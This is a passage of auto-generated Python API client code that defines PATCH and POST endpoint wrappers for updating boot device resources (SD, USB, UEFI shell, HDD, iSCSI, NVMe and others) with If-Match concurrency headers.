if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootSdDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_sd_device'] = \
boot_sd_device
return self.call_with_http_info(**kwargs)
self.patch_boot_sd_device = _Endpoint(
settings={
'response_type': (BootSdDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/SdDevices/{Moid}',
'operation_id': 'patch_boot_sd_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_sd_device',
'if_match',
],
'required': [
'moid',
'boot_sd_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_sd_device':
(BootSdDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_sd_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_sd_device
)
def __patch_boot_uefi_shell_device(
self,
moid,
boot_uefi_shell_device,
**kwargs
):
"""Update a 'boot.UefiShellDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_uefi_shell_device(moid, boot_uefi_shell_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_uefi_shell_device (BootUefiShellDevice): The 'boot.UefiShellDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootUefiShellDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_uefi_shell_device'] = \
boot_uefi_shell_device
return self.call_with_http_info(**kwargs)
self.patch_boot_uefi_shell_device = _Endpoint(
settings={
'response_type': (BootUefiShellDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/UefiShellDevices/{Moid}',
'operation_id': 'patch_boot_uefi_shell_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_uefi_shell_device',
'if_match',
],
'required': [
'moid',
'boot_uefi_shell_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_uefi_shell_device':
(BootUefiShellDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_uefi_shell_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_uefi_shell_device
)
def __patch_boot_usb_device(
self,
moid,
boot_usb_device,
**kwargs
):
"""Update a 'boot.UsbDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_usb_device(moid, boot_usb_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_usb_device (BootUsbDevice): The 'boot.UsbDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootUsbDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_usb_device'] = \
boot_usb_device
return self.call_with_http_info(**kwargs)
self.patch_boot_usb_device = _Endpoint(
settings={
'response_type': (BootUsbDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/UsbDevices/{Moid}',
'operation_id': 'patch_boot_usb_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_usb_device',
'if_match',
],
'required': [
'moid',
'boot_usb_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_usb_device':
(BootUsbDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_usb_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_usb_device
)
def __patch_boot_vmedia_device(
self,
moid,
boot_vmedia_device,
**kwargs
):
"""Update a 'boot.VmediaDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_vmedia_device(moid, boot_vmedia_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_vmedia_device (BootVmediaDevice): The 'boot.VmediaDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootVmediaDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_vmedia_device'] = \
boot_vmedia_device
return self.call_with_http_info(**kwargs)
self.patch_boot_vmedia_device = _Endpoint(
settings={
'response_type': (BootVmediaDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/VmediaDevices/{Moid}',
'operation_id': 'patch_boot_vmedia_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_vmedia_device',
'if_match',
],
'required': [
'moid',
'boot_vmedia_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_vmedia_device':
(BootVmediaDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_vmedia_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_vmedia_device
)
def __update_boot_cdd_device(
self,
moid,
boot_cdd_device,
**kwargs
):
"""Update a 'boot.CddDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_cdd_device(moid, boot_cdd_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_cdd_device (BootCddDevice): The 'boot.CddDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootCddDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_cdd_device'] = \
boot_cdd_device
return self.call_with_http_info(**kwargs)
self.update_boot_cdd_device = _Endpoint(
settings={
'response_type': (BootCddDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/CddDevices/{Moid}',
'operation_id': 'update_boot_cdd_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_cdd_device',
'if_match',
],
'required': [
'moid',
'boot_cdd_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_cdd_device':
(BootCddDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_cdd_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_cdd_device
)
def __update_boot_device_boot_mode(
self,
moid,
boot_device_boot_mode,
**kwargs
):
"""Update a 'boot.DeviceBootMode' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_device_boot_mode(moid, boot_device_boot_mode, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_device_boot_mode (BootDeviceBootMode): The 'boot.DeviceBootMode' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootDeviceBootMode
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_device_boot_mode'] = \
boot_device_boot_mode
return self.call_with_http_info(**kwargs)
self.update_boot_device_boot_mode = _Endpoint(
settings={
'response_type': (BootDeviceBootMode,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/DeviceBootModes/{Moid}',
'operation_id': 'update_boot_device_boot_mode',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_device_boot_mode',
'if_match',
],
'required': [
'moid',
'boot_device_boot_mode',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_device_boot_mode':
(BootDeviceBootMode,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_device_boot_mode': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_device_boot_mode
)
def __update_boot_device_boot_security(
self,
moid,
boot_device_boot_security,
**kwargs
):
"""Update a 'boot.DeviceBootSecurity' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_device_boot_security(moid, boot_device_boot_security, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_device_boot_security (BootDeviceBootSecurity): The 'boot.DeviceBootSecurity' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootDeviceBootSecurity
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_device_boot_security'] = \
boot_device_boot_security
return self.call_with_http_info(**kwargs)
self.update_boot_device_boot_security = _Endpoint(
settings={
'response_type': (BootDeviceBootSecurity,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/DeviceBootSecurities/{Moid}',
'operation_id': 'update_boot_device_boot_security',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_device_boot_security',
'if_match',
],
'required': [
'moid',
'boot_device_boot_security',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_device_boot_security':
(BootDeviceBootSecurity,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_device_boot_security': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_device_boot_security
)
def __update_boot_hdd_device(
self,
moid,
boot_hdd_device,
**kwargs
):
"""Update a 'boot.HddDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_hdd_device(moid, boot_hdd_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_hdd_device (BootHddDevice): The 'boot.HddDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootHddDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_hdd_device'] = \
boot_hdd_device
return self.call_with_http_info(**kwargs)
self.update_boot_hdd_device = _Endpoint(
settings={
'response_type': (BootHddDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/HddDevices/{Moid}',
'operation_id': 'update_boot_hdd_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_hdd_device',
'if_match',
],
'required': [
'moid',
'boot_hdd_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_hdd_device':
(BootHddDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_hdd_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_hdd_device
)
def __update_boot_iscsi_device(
self,
moid,
boot_iscsi_device,
**kwargs
):
"""Update a 'boot.IscsiDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_iscsi_device(moid, boot_iscsi_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_iscsi_device (BootIscsiDevice): The 'boot.IscsiDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootIscsiDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_iscsi_device'] = \
boot_iscsi_device
return self.call_with_http_info(**kwargs)
self.update_boot_iscsi_device = _Endpoint(
settings={
'response_type': (BootIscsiDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/IscsiDevices/{Moid}',
'operation_id': 'update_boot_iscsi_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_iscsi_device',
'if_match',
],
'required': [
'moid',
'boot_iscsi_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_iscsi_device':
(BootIscsiDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_iscsi_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_iscsi_device
)
def __update_boot_nvme_device(
self,
moid,
boot_nvme_device,
**kwargs
):
"""Update a 'boot.NvmeDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_nvme_device(moid, boot_nvme_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_nvme_device (BootNvmeDevice): The 'boot.NvmeDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootNvmeDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
